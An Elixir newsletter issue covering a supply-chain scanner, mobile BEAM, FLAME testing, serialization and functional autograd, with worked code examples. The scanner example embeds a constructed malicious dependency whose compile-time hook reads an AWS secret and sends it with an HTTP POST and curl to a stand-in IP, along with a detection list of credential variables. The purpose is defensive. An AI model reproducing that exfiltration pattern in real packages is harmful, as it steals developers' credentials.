Welcome to GigaElixir Gazette, your 5-minute digest of Elixir ecosystem news that actually matters.

This week, we look at a supply chain security scanner that catches malicious dependencies before they execute, a framework putting the BEAM natively on mobile devices, and why building a GPT from scratch in Elixir reveals things Python hides.

. WEEKLY PICKS .

🔥 Vet Catches Supply Chain Attacks Before mix deps.compile

Someone compromised LiteLLM's PyPI token last month. Three hours, hundreds of thousands of infected installs, 4TB of data stolen from a $10B startup. The attack was three lines of work. The ecosystem did the rest.

Elixir is not immune. A package can call System.get_env("AWS_SECRET_ACCESS_KEY") inside a @before_compile hook and POST the result during mix deps.compile. Your app has not started. Your tests have not run. Vet walks the AST of every dependency in your lock file and flags patterns that rarely have a legitimate reason to exist in a library's compile path: compile-time system commands, credential access, network calls to suspicious endpoints, obfuscated payloads, plus slopsquatting detection for package names LLMs commonly hallucinate.

The key insight: the same tools the compiler uses are available to any library. Code.string_to_quoted/1 turns a dependency's source into the quoted AST and Macro.prewalk/3 walks it, so mix vet.check inspects code without ever evaluating it. (Python's ast module allows a similar static pass; what the Elixir story has going for it is that fetching a Hex tarball executes nothing from the package, so there is a clean window between mix deps.get and mix deps.compile in which to scan.) One caveat a reviewer would add: an AST scan is a heuristic. Calls assembled with apply/3, Module.concat/1 or Code.eval_string/1 do not look like System.get_env in the tree, so treat a clean report as one signal alongside pinned versions and the checksums in mix.lock, not as proof of safety.
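To make the mechanism concrete, here is an added example in the spirit of mix vet.check. It is not Vet's code: the rule set, the suspicious-name lists and the EvilHelper sample package are all constructed for illustration. It parses the source with Code.string_to_quoted/1, walks it with Macro.prewalk/3, and reports compile-time hooks, shell-outs, credential reads, network calls and dynamic dispatch with their line numbers, without executing anything.

```elixir
# Added example, not Vet's code. Run with: elixir dep_scan.exs
defmodule DepScan do
  # Constructed sample dependency: steals a credential while the host project compiles.
  @sample_source """
  defmodule EvilHelper do
    @before_compile {__MODULE__, :__phone_home__}

    defmacro __phone_home__(_env) do
      key = System.get_env("AWS_SECRET_ACCESS_KEY")
      :httpc.request(:post, {"http://203.0.113.7/c", [], "text/plain", key}, [], [])
      System.cmd("curl", ["-s", "http://203.0.113.7/i"])
      quote do: :ok
    end

    def helper(x), do: x + 1
  end
  """

  # Assumed lists for this example; a real scanner would ship a larger, maintained set.
  @credential_vars ~w(AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID HEX_API_KEY GITHUB_TOKEN NPM_TOKEN)
  @net_erlang [:httpc, :gen_tcp, :gen_udp, :ssl]
  @net_elixir [:HTTPoison, :Req, :Finch, :Tesla, :Mint]

  def sample_source, do: @sample_source

  @doc "Parse `source` and return [{rule, line}] ordered by line. The source is never evaluated."
  def scan(source) do
    case Code.string_to_quoted(source) do
      {:ok, ast} ->
        {_ast, findings} =
          Macro.prewalk(ast, [], fn node, acc ->
            case rule_for(node) do
              nil -> {node, acc}
              rule -> {node, [{rule, line_of(node)} | acc]}
            end
          end)

        findings |> Enum.reverse() |> Enum.sort_by(&elem(&1, 1))

      {:error, reason} ->
        # Source that does not parse is itself worth a look in a published package.
        [{{:unparseable, inspect(reason)}, nil}]
    end
  end

  # Compile-time hooks: whatever they run executes during `mix deps.compile`.
  defp rule_for({:@, _, [{hook, _, _}]}) when hook in [:before_compile, :after_compile, :on_load],
    do: {:compile_time_hook, hook}

  # Shelling out from a library.
  defp rule_for({{:., _, [{:__aliases__, _, [:System]}, fun]}, _, _}) when fun in [:cmd, :shell],
    do: :system_command

  defp rule_for({{:., _, [:os, :cmd]}, _, _}), do: :system_command

  # Reading a known secret from the environment.
  defp rule_for({{:., _, [{:__aliases__, _, [:System]}, fun]}, _, [name | _]})
       when fun in [:get_env, :fetch_env, :fetch_env!] and name in @credential_vars,
       do: {:credential_access, name}

  # Outbound network through Erlang or Elixir HTTP/TCP clients.
  defp rule_for({{:., _, [mod, _fun]}, _, _}) when mod in @net_erlang, do: {:network_call, mod}

  defp rule_for({{:., _, [{:__aliases__, _, [mod | _]}, _fun]}, _, _}) when mod in @net_elixir,
    do: {:network_call, mod}

  # Dynamic dispatch and eval are the usual way to hide the calls above from a static pass.
  defp rule_for({:apply, _, [_, _, _]}), do: :dynamic_dispatch
  defp rule_for({{:., _, [{:__aliases__, _, [:Code]}, :eval_string]}, _, _}), do: :code_eval

  defp rule_for(_), do: nil

  defp line_of({_, meta, _}) when is_list(meta), do: Keyword.get(meta, :line)
  defp line_of(_), do: nil

  def report(findings) do
    Enum.each(findings, fn {rule, line} -> IO.puts("  line #{inspect(line)}: #{inspect(rule)}") end)
    findings
  end

  @doc "Scan every source file under deps/ (mix.exs included), as a mix task would."
  def scan_deps(deps_dir \\ "deps") do
    deps_dir
    |> Path.join("**/*.{ex,exs}")
    |> Path.wildcard()
    |> Enum.map(fn path -> {path, scan(File.read!(path))} end)
    |> Enum.reject(fn {_path, findings} -> findings == [] end)
    |> Map.new()
  end
end

DepScan.sample_source() |> DepScan.scan() |> DepScan.report()
```

On the constructed sample this reports the @before_compile hook on line 2, the credential read, the :httpc call and the System.cmd shell-out, each with its line. Scanning mix.exs alongside lib/ matters because a dependency's mix.exs also runs during compilation; and the :dynamic_dispatch and :code_eval rules exist precisely because an attacker who knows the scanner will spell System.get_env as apply(System, :get_env, [...]) or hide it in a string for Code.eval_string/1.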

Mob Puts the BEAM on Your Phone with LiveView-Style Native UI

Everyone assumed LiveView Native would mean the BEAM running on-device. It did not - LVN needs a Phoenix server. Mob takes the road people actually expected. A thin native shell boots the BEAM directly on Android or iOS. From there, Elixir owns everything. render/1 returns a component tree, NIFs create real native views, and a diff engine patches only what changed. No WebView, no JavaScript, no server round-trips.

The developer experience mirrors Phoenix. mix mob.dev starts a file watcher; save a file and the updated module is pushed to the device over WiFi via Erlang distribution, and you get a full IEx shell into the on-device BEAM to inspect GenServer state, trace calls and debug live. One caveat worth stating plainly: Erlang distribution is remote code execution by design, so anyone who can reach the distribution port with the node's cookie owns the app. Keep that path in debug builds on a trusted network, never in a release. OTA updates rely on the same interpreted-code exception that covers React Native CodePush.

HelloScreen is confirmed working on Android emulator, real Android phone, and iOS simulator. The framework is early, but the architectural bet is clear: if your app logic is already in Elixir, it should stay in Elixir on the phone too.

🛠️ FlamePeer Lets You Test FLAME Distribution Without Leaving localhost

FLAME's LocalBackend does not actually mimic a FLAME cluster. If your code depends on distribution working correctly - process placement, data locality, cross-node communication - you have been stuck testing against a real backend like Fly or EC2, or deploying and hoping.

FlamePeer provides a FLAME backend for Erlang :peer nodes. Same distributed semantics, same process spawning behavior, all running locally. From the creator of SafeNIF and FlameEC2, this library uses :peer to spin up real Erlang nodes on your machine. Your FLAME code runs against actual distribution without cloud costs or deployment cycles.

💡 Journey + Bumblebee Build an AI Recruiting Pipeline in Pure Elixir

A recruiting workflow that validates resumes with zero-shot classification via Bumblebee/Nx, scores candidates against job descriptions with a local Ollama LLM, and broadcasts results through Phoenix PubSub - all orchestrated by Journey, a DAG-based workflow library.

The architecture is clean. Journey's compute nodes unblock when prerequisites are met. Resume validation runs facebook/bart-large-mnli locally - no API calls, no per-inference cost. Valid resumes trigger parallel summarization and scoring against gemma3:4b. PubSub pushes updates to the LiveView UI in real time. The entire pipeline is open source and runs on your machine.

🎯 DeukPack Serializes Unity-to-Elixir Without NIFs or Allocations

Bridging C# (Unity) and Elixir usually means fighting protobuf pipelines or eating JSON overhead. DeukPack generates pure Elixir code using native binary pattern matching for serialization - no NIFs, no scheduler blocking. The C# side is zero-allocation and struct-based, optimized for Unity's frame loop.

Built-in MAX_SAFE_LENGTH checks prevent OOM from malformed packets. If you are building real-time multiplayer infrastructure on the BEAM, this is the kind of library that eliminates an entire class of interop pain.
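The length-cap idea deserves a worked example, because the place it matters is not the pattern match itself but the stream framer in front of it. The code below is an added example and not DeukPack's code; the cap values, the frame layout and the player record are assumptions for illustration. It frames a TCP byte stream with a 32-bit length prefix, refuses an oversized header before buffering toward it, and decodes a typed payload with binary pattern matching only.

```elixir
# Added example, not DeukPack's code. Run with: elixir frames.exs
defmodule Frames do
  @moduledoc """
  Length-prefixed framing plus a typed payload, decoded with binary pattern
  matching only (no NIFs). Every length read from the wire is checked against a
  cap before the code waits for, or allocates, that many bytes.
  """

  # Assumed caps for this example; DeukPack's MAX_SAFE_LENGTH value is not on the page.
  @max_safe_length 64 * 1024
  @max_name_length 32

  defstruct buf: <<>>

  def new, do: %__MODULE__{}

  @doc """
  Append a chunk from the socket and pull out every complete frame.
  Returns {:ok, frames, framer} or {:error, reason, framer}; on :error close the connection.
  """
  def feed(%__MODULE__{buf: buf} = f, chunk) when is_binary(chunk),
    do: drain(%{f | buf: buf <> chunk}, [])

  # The header claims more than we allow: reject now. Without this clause the
  # framer would keep appending chunks until the claimed 4 GiB arrived.
  defp drain(%{buf: <<len::unsigned-big-32, _::binary>>} = f, _acc)
       when len > @max_safe_length,
       do: {:error, {:frame_too_large, len}, %{f | buf: <<>>}}

  # A whole frame is present: peel it off and keep going.
  defp drain(%{buf: <<len::unsigned-big-32, body::binary-size(len), rest::binary>>} = f, acc),
    do: drain(%{f | buf: rest}, [body | acc])

  # Fewer than 4 bytes, or a sane header whose body is still incomplete: wait for more.
  defp drain(f, acc), do: {:ok, Enum.reverse(acc), f}

  def encode_frame(body) when byte_size(body) <= @max_safe_length,
    do: <<byte_size(body)::unsigned-big-32, body::binary>>

  # Payload layout (assumed): id u16, x f32, y f32, name_len u8, name bytes.
  # The size of `name` is taken from `name_len` in the same match; a short or
  # over-long body simply fails to match instead of reading past the buffer.
  def decode_player(
        <<id::unsigned-big-16, x::float-big-32, y::float-big-32,
          name_len::unsigned-8, name::binary-size(name_len)>>
      )
      when name_len <= @max_name_length,
      do: {:ok, %{id: id, x: x, y: y, name: name}}

  def decode_player(_), do: {:error, :malformed_player}

  def encode_player(%{id: id, x: x, y: y, name: name}) when byte_size(name) <= @max_name_length,
    do: <<id::unsigned-big-16, x::float-big-32, y::float-big-32, byte_size(name)::unsigned-8, name::binary>>
end

player = %{id: 7, x: 1.5, y: -2.0, name: "ana"}
frame = Frames.encode_frame(Frames.encode_player(player))

# Bytes arrive in pieces; nothing is emitted until the frame is complete.
<<head::binary-size(3), tail::binary>> = frame
{:ok, [], framer} = Frames.feed(Frames.new(), head)
{:ok, [body], framer} = Frames.feed(framer, tail)
{:ok, ^player} = Frames.decode_player(body)

# A header claiming 4 GiB is refused immediately instead of being buffered toward.
{:error, {:frame_too_large, 4_294_967_295}, _} = Frames.feed(framer, <<0xFFFFFFFF::32, "junk">>)
IO.puts("framing ok")
```

Note where the check sits: a bare `body::binary-size(len)` match on a too-short binary fails harmlessly and allocates nothing, so the memory risk is in the buffer that accumulates while waiting for a frame the peer will never finish. Capping the length at the header, before any body bytes are kept, is what turns a malformed packet into a closed connection rather than an exhausted node.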

💡 Pro Tip

Your Neural Network Does Not Need Nx to Teach You How Backprop Works

Matthew Sinclair finished a 4-part series building GPT from scratch in Elixir - no Nx, no external dependencies, ~1,500 lines of pure Elixir.

The autograd engine, tokenizer, attention mechanism, Adam optimizer, and autoregressive sampler all built on Value structs and immutable maps. The training loop is a single Enum.reduce that threads {model, optimizer_state} through every step.

The pedagogical payoff is real.

Python's backward() mutates .grad fields via += as a side effect. Elixir's backward/1 returns an immutable gradient map you can hold, compare, and pass to multiple consumers.

The optimizer communicates with the model through ID-keyed maps - {"wte", 2, 5} links a parameter deterministically through the entire round-trip. No shared mutable state, no ambiguity about which parameter is which.

When the author got confused about backpropagation, they could inspect the gradient map directly. That is the advantage of functional ML: it shows its work.

Remember for functional ML implementation:

  • Immutable autograd returns gradient maps instead of mutating .grad fields - hold, compare, and replay gradient computations freely

  • Thread RNG state, KV cache, and optimizer moments through function arguments for deterministic training runs without seed hacks

  • Use the pure core / impure shell pattern - eight of nine modules are pure, IO happens only through callbacks the caller provides

  • Stable {tag, row, col} parameter IDs link weights through the model-flatten-gradient-optimize-update round-trip without shared references
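The immutable-autograd and stable-ID points above fit in a few dozen lines, so here is an added example, not the series' own code and not Nx: a scalar reverse-mode autograd whose backward/1 returns a gradient map keyed by value id, plus an SGD step that only ever sees those ids. The {"w", row, col} and {"b", row} ids, the tanh/add/mul op set and the learning rate are assumptions for illustration.

```elixir
# Added example, not the series' own code. Run with: elixir autograd.exs
defmodule Autograd do
  @moduledoc """
  Minimal scalar reverse-mode autograd. A Value is immutable; backward/1 returns
  a map of gradients keyed by value id instead of writing into a .grad field.
  """
  defstruct [:id, :data, :op, children: []]

  # Leaves get caller-chosen, stable ids such as {"wte", 2, 5}; intermediates get refs.
  def param(x, id), do: %__MODULE__{id: id, data: x / 1, op: :leaf}

  def add(a, b), do: node(:add, a.data + b.data, [a, b])
  def mul(a, b), do: node(:mul, a.data * b.data, [a, b])
  def tanh(a), do: node(:tanh, :math.tanh(a.data), [a])

  defp node(op, data, children),
    do: %__MODULE__{id: make_ref(), data: data, op: op, children: children}

  @doc "Returns %{id => d(out)/d(value)} for every value reachable from `out`; `out` is untouched."
  def backward(%__MODULE__{} = out) do
    {order, _seen} = topo(out, [], MapSet.new())
    # `order` lists each node before its children (reverse post-order), so a
    # node's own gradient is complete before it is pushed to its inputs.
    Enum.reduce(order, %{out.id => 1.0}, &propagate/2)
  end

  # Depth-first post-order with prepend, which yields parents before children.
  defp topo(%{id: id} = v, order, seen) do
    if MapSet.member?(seen, id) do
      {order, seen}
    else
      {order, seen} =
        Enum.reduce(v.children, {order, MapSet.put(seen, id)}, fn c, {o, s} -> topo(c, o, s) end)

      {[v | order], seen}
    end
  end

  defp propagate(%{op: :leaf}, grads), do: grads

  defp propagate(%{id: id, children: children} = v, grads) do
    g = Map.fetch!(grads, id)

    children
    |> Enum.zip(local_grads(v))
    |> Enum.reduce(grads, fn {child, local}, acc ->
      # A child used twice (e.g. mul(a, a)) accumulates both contributions.
      Map.update(acc, child.id, g * local, &(&1 + g * local))
    end)
  end

  # Partial derivative of the node with respect to each child, in order.
  defp local_grads(%{op: :add}), do: [1.0, 1.0]
  defp local_grads(%{op: :mul, children: [a, b]}), do: [b.data, a.data]
  defp local_grads(%{op: :tanh, data: t}), do: [1.0 - t * t]

  @doc "Plain SGD. The optimizer never touches the graph; ids are the only link to the model."
  def sgd(params, grads, lr) do
    Map.new(params, fn {id, p} ->
      {id, %{p | data: p.data - lr * Map.get(grads, id, 0.0)}}
    end)
  end
end

params = %{
  {"w", 0, 0} => Autograd.param(0.5, {"w", 0, 0}),
  {"w", 0, 1} => Autograd.param(-1.0, {"w", 0, 1}),
  {"b", 0} => Autograd.param(0.2, {"b", 0})
}

# Forward pass: tanh(w00 * w01 + b0)
out =
  Autograd.mul(params[{"w", 0, 0}], params[{"w", 0, 1}])
  |> Autograd.add(params[{"b", 0}])
  |> Autograd.tanh()

grads = Autograd.backward(out)
IO.inspect(Map.take(grads, Map.keys(params)), label: "parameter gradients")

new_params = Autograd.sgd(params, grads, 0.1)
IO.inspect(new_params[{"w", 0, 0}].data, label: "w00 after one step")

# `params`, `out` and `grads` are unchanged; calling backward(out) again yields
# the same map, which is what makes a training step replayable and inspectable.
^grads = Autograd.backward(out)
```

The part to notice is the boundary: the model builds a graph and hands back a map of numbers, the optimizer takes that map plus the parameter map and returns a new parameter map, and the only thing shared between them is the id convention. That is the "model-flatten-gradient-optimize-update round-trip without shared references" from the list above, reduced to its smallest working form.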

. TIRED OF DEVOPS HEADACHES? .

Deploy your next Elixir app hassle-free with Gigalixir and focus more on coding, less on ops.

We're specifically designed to support all the features that make Elixir special, so you can keep building amazing things without becoming a DevOps expert.

See you next week,

Michael

P.S. Forward this to a friend who loves Elixir as much as you do 💜
